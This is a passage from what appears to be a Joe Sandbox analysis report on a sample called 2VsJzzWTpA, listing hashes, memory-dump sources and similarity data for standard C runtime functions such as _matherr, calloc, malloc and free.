                • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Overflow range error (OVERFLOW), xrefs: 00401D00
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4064033741
                • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2187435201
                • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Total loss of significance (TLOSS), xrefs: 00401D20
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4273532761
                • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Argument domain error (DOMAIN), xrefs: 00401CE0
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2713391170
                • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Partial loss of significance (PLOSS), xrefs: 00401CF0
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4283191376
                • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Argument singularity (SIGN), xrefs: 00401C78
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2468659920
                • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                APIs
                • calloc.LIBCMT ref: 001A116A
                  • Part of subcall function 001CE208: _calloc_impl.LIBCMT ref: 001CE218
                  • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE22B
                  • Part of subcall function 001CE208: _errno.LIBCMT ref: 001CE235
                • free.LIBCMT ref: 001A12F3
                • free.LIBCMT ref: 001A12FD
                • free.LIBCMT ref: 001A130F
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_calloc_implcalloc
                • String ID:
                • API String ID: 4000150058-0
                • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                • Instruction ID: ef13a074418b6d296590a38f5d20f9b5ca4bc9d75961e5e567413d64bbd8a4b0
                • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                • Instruction Fuzzy Hash: 09C10C36608B859AD764CF65E88479EB7F4F789B88F10412AEB8D87B18DF38C555CB00
                APIs
                • calloc.LIBCMT ref: 00661D6A
                  • Part of subcall function 0068EE08: _calloc_impl.LIBCMT ref: 0068EE18
                  • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE2B
                  • Part of subcall function 0068EE08: _errno.LIBCMT ref: 0068EE35
                • free.LIBCMT ref: 00661EF3
                • free.LIBCMT ref: 00661EFD
                • free.LIBCMT ref: 00661F0F
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_calloc_implcalloc
                • String ID:
                • API String ID: 4000150058-0
                • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                • Instruction ID: 1a8b3b2cf1c52a6259925237e4e9cbc3425f2cca5b61c0d3a4cc04866f41f30a
                • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                • Instruction Fuzzy Hash: 18C13B32608B848AD760CF65E88039E77B5F789B88F14412AEF8D87B18EF39C555CB00
                APIs
                • malloc.LIBCMT ref: 001BA178
                  • Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
                  • Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
                  • Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
                  • Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708
                • free.LIBCMT ref: 001BA2BF
                • free.LIBCMT ref: 001BA323
                • free.LIBCMT ref: 001BA32F
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$_callnewhmalloc
                • String ID:
                • API String ID: 2761444284-0
                • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                • Instruction ID: 186e246a70f57c853be465db647510dd0cca896556ffc241b6b8c2dc239f5aab
                • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                • Instruction Fuzzy Hash: 5D51003130074582DE28AF22E8507ED63E2FBA5BC0F984429EE4A17B65EF79C502C701
                APIs
                • malloc.LIBCMT ref: 0067AD78
                  • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                  • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                  • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                  • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                  • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                • free.LIBCMT ref: 0067AEBF
                • free.LIBCMT ref: 0067AF23
                • free.LIBCMT ref: 0067AF2F
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno$AllocHeap_callnewhmalloc
                • String ID:
                • API String ID: 3531731211-0
                • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                • Instruction ID: 4dfa9effe5ef590a14f708f6425d43e3cd84eb666ee08e0ad8d86dc367fc0050
                • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                • Instruction Fuzzy Hash: D751007630064582DA98ABA2D4503AD7393FBC4B80F54893AEE0E27B56EF7DC515C706
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                • Instruction ID: 77d767e9024fda2d898012a813aef0076d0c7132e078364397b5c0eabe0b130c
                • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                • Instruction Fuzzy Hash: 2C41BE7670078087CB18DF66E4107AE77A1F796B84F458625FE2A47B08EF38DA06C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: malloc
                • String ID:
                • API String ID: 2803490479-0
                • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                • Instruction ID: 530ed90c7799d936ae7596f3242aec9e382011cf7b4911ccbaf5d58aa51a8d27
                • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                • Instruction Fuzzy Hash: B541CA3230478087CB58DF66E411BAE73A2F784F88F548529EE6A87B05EF38D946C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CurrentProcessfreemalloc
                • String ID:
                • API String ID: 1397824077-0
                • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                • Instruction ID: e3c96e085606936993393d51645e5bd6fe23844c8dd89ffb8ca1b770db688147
                • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                • Instruction Fuzzy Hash: 52418372314A8186DB64DB26E4417AF63A3FB857D8F00942AEF8E4BB49EF3DC5418704